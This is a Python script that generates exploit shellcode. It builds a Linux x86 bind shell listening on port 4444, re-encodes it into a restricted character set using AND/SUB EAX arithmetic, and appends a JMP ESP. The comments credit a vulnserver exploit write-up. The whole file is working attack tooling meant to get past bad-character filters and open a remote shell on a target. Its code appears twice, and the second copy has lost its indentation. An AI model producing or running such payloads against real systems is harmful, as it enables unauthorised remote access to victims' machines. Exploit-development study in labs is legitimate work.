thesp0nge/generate.py

## generate.py
#!/usr/bin/env python
# Please install shellerate>=0.4.2 before: pip install shellerate

import sys
import string
import logging
import secrets
from shellerate import strings;
from shellerate import asm_x86;
from shellerate.bind_shellcode import BindShellcode;


# The code for find_encoded_sequence and generate_add_eax_sum_shellcode was
# taken from https://www.kerrymilan.com vulnserver works with some slight
# change and integrating into shellerate


def find_encoded_sequence(dword, three=False):
  allowed="\x01\x02\x03\x04\x05\x06\x07\x08\x09\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3b\x3c\x3d\x3e\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7d"
  a_int = [ord(n) for n in list(allowed)]

  matches = []
  zero = False
  carry = 0
  for x in range(0, 4):
    byte = (dword - (carry | zero)) % 256

    found = False
    l = [(f1, f2) for f1 in a_int for f2 in a_int]
    if three:
      l = [(f1, f2, f3) for f1 in a_int for f2 in a_int for f3 in a_int]

    for i in l:
      if not found and (sum(i) % 256) == byte and len(set(i) - set(a_int)) == 0:
        found = True

        carry = (sum(i) >= 0x100)
        zero = False #(byte == 0xFF)
        matches.append(i)
    dword >>= 8

  return matches


def generate_add_eax_sum_shellcode(result):
  compl_two = int("FFFFFFFF", 16) - int(result, 16) + 1

  c = find_encoded_sequence(compl_two)
  c2_h = "0x{:08x}".format(compl_two)
  f = ["".join(["{:02x}".format(j) for j in list(i)]) for i in zip(*c[::-1])]
  f_sum = "0x{:08x}".format(sum([int(i, 16) for i in f]) % (2**32))

  if (c2_h != f_sum):
    logging.warning("can't find a good encoded sequence using 2 operands... trying with 3")
    c = find_encoded_sequence(compl_two, True)
    f = ["".join(["{:02x}".format(j) for j in list(i)]) for i in zip(*c[::-1])]
    f_sum = "0x{:08x}".format(sum([int(i, 16) for i in f]) % (2**32))

    if(c2_h != f_sum):
      logging.error("can't find a good encoded sequence. Please consider changing this shellcode sequence" + result)
      return ""

  logging.debug("obtaining 0x{0} with this ASM sequence".format(result))
  for i in ("554e4d4a", "2a313235"):
    logging.debug("AND EAX, 0x{0}".format(i))
  for j in f:
    logging.debug("SUB EAX, 0x{0}".format(j))
  logging.debug("PUSH EAX")

  shellcode = asm_x86.zero_with_and("eax")
  for i in f:
    shellcode += "\\x2d" + strings.from_string_to_payload(strings.swap(i))
  shellcode+="\\x50"

  return shellcode

def generate_exploit():
  b=BindShellcode(4444, 'x86', 'linux')
  b.generate()
  original_shellcode = b.shellcode()

  padded = strings.pad(original_shellcode)
  o1 = strings.from_char_to_hexcode(padded)
  reverse=strings.reverse(o1)
  logging.debug(reverse)

  words = strings.split(reverse, 8)
  shellcode = ""

  shellcode += asm_x86.zero_eax()
  shellcode += asm_x86.get_esp_address_in_eax()


  # shellcode += "\\x2d\\x66\\x4d\\x55\\x55\\x2d\\x66\\x4b\\x55\\x55\\x2d\\x6a\\x50\\x55\\x55" # get some free space into the stack
  # shellcode += "\\x50\\x5c" #PUSH EAX + POP ESP

  for w in words:
    logging.debug(w)
    shellcode += generate_add_eax_sum_shellcode(w)


  shellcode += "\\xff\\xe4";

  return shellcode

if __name__ == "__main__":
  logging.basicConfig(format='[%(levelname)s] %(asctime)s - %(message)s',
      level=logging.DEBUG,
      datefmt='%d/%b/%y %H:%M:%S')

  logging.debug("GENERATING shellcode")

  sc=generate_exploit()
  print(sc)
	#!/usr/bin/env python
	# Please install shellerate>=0.4.2 before: pip install shellerate

	import sys
	import string
	import logging
	import secrets
	from shellerate import strings;
	from shellerate import asm_x86;
	from shellerate.bind_shellcode import BindShellcode;


	# The code for find_encoded_sequence and generate_add_eax_sum_shellcode was
	# taken from https://www.kerrymilan.com vulnserver works with some slight
	# change and integrating into shellerate


	def find_encoded_sequence(dword, three=False):
	allowed="\x01\x02\x03\x04\x05\x06\x07\x08\x09\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3b\x3c\x3d\x3e\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7d"
	a_int = [ord(n) for n in list(allowed)]

	matches = []
	zero = False
	carry = 0
	for x in range(0, 4):
	byte = (dword - (carry \| zero)) % 256

	found = False
	l = [(f1, f2) for f1 in a_int for f2 in a_int]
	if three:
	l = [(f1, f2, f3) for f1 in a_int for f2 in a_int for f3 in a_int]

	for i in l:
	if not found and (sum(i) % 256) == byte and len(set(i) - set(a_int)) == 0:
	found = True

	carry = (sum(i) >= 0x100)
	zero = False #(byte == 0xFF)
	matches.append(i)
	dword >>= 8

	return matches


	def generate_add_eax_sum_shellcode(result):
	compl_two = int("FFFFFFFF", 16) - int(result, 16) + 1

	c = find_encoded_sequence(compl_two)
	c2_h = "0x{:08x}".format(compl_two)
	f = ["".join(["{:02x}".format(j) for j in list(i)]) for i in zip(*c[::-1])]
	f_sum = "0x{:08x}".format(sum([int(i, 16) for i in f]) % (2**32))

	if (c2_h != f_sum):
	logging.warning("can't find a good encoded sequence using 2 operands... trying with 3")
	c = find_encoded_sequence(compl_two, True)
	f = ["".join(["{:02x}".format(j) for j in list(i)]) for i in zip(*c[::-1])]
	f_sum = "0x{:08x}".format(sum([int(i, 16) for i in f]) % (2**32))

	if(c2_h != f_sum):
	logging.error("can't find a good encoded sequence. Please consider changing this shellcode sequence" + result)
	return ""

	logging.debug("obtaining 0x{0} with this ASM sequence".format(result))
	for i in ("554e4d4a", "2a313235"):
	logging.debug("AND EAX, 0x{0}".format(i))
	for j in f:
	logging.debug("SUB EAX, 0x{0}".format(j))
	logging.debug("PUSH EAX")

	shellcode = asm_x86.zero_with_and("eax")
	for i in f:
	shellcode += "\\x2d" + strings.from_string_to_payload(strings.swap(i))
	shellcode+="\\x50"

	return shellcode

	def generate_exploit():
	b=BindShellcode(4444, 'x86', 'linux')
	b.generate()
	original_shellcode = b.shellcode()

	padded = strings.pad(original_shellcode)
	o1 = strings.from_char_to_hexcode(padded)
	reverse=strings.reverse(o1)
	logging.debug(reverse)

	words = strings.split(reverse, 8)
	shellcode = ""

	shellcode += asm_x86.zero_eax()
	shellcode += asm_x86.get_esp_address_in_eax()


	# shellcode += "\\x2d\\x66\\x4d\\x55\\x55\\x2d\\x66\\x4b\\x55\\x55\\x2d\\x6a\\x50\\x55\\x55" # get some free space into the stack
	# shellcode += "\\x50\\x5c" #PUSH EAX + POP ESP

	for w in words:
	logging.debug(w)
	shellcode += generate_add_eax_sum_shellcode(w)


	shellcode += "\\xff\\xe4";

	return shellcode

	if __name__ == "__main__":
	logging.basicConfig(format='[%(levelname)s] %(asctime)s - %(message)s',
	level=logging.DEBUG,
	datefmt='%d/%b/%y %H:%M:%S')

	logging.debug("GENERATING shellcode")

	sc=generate_exploit()
	print(sc)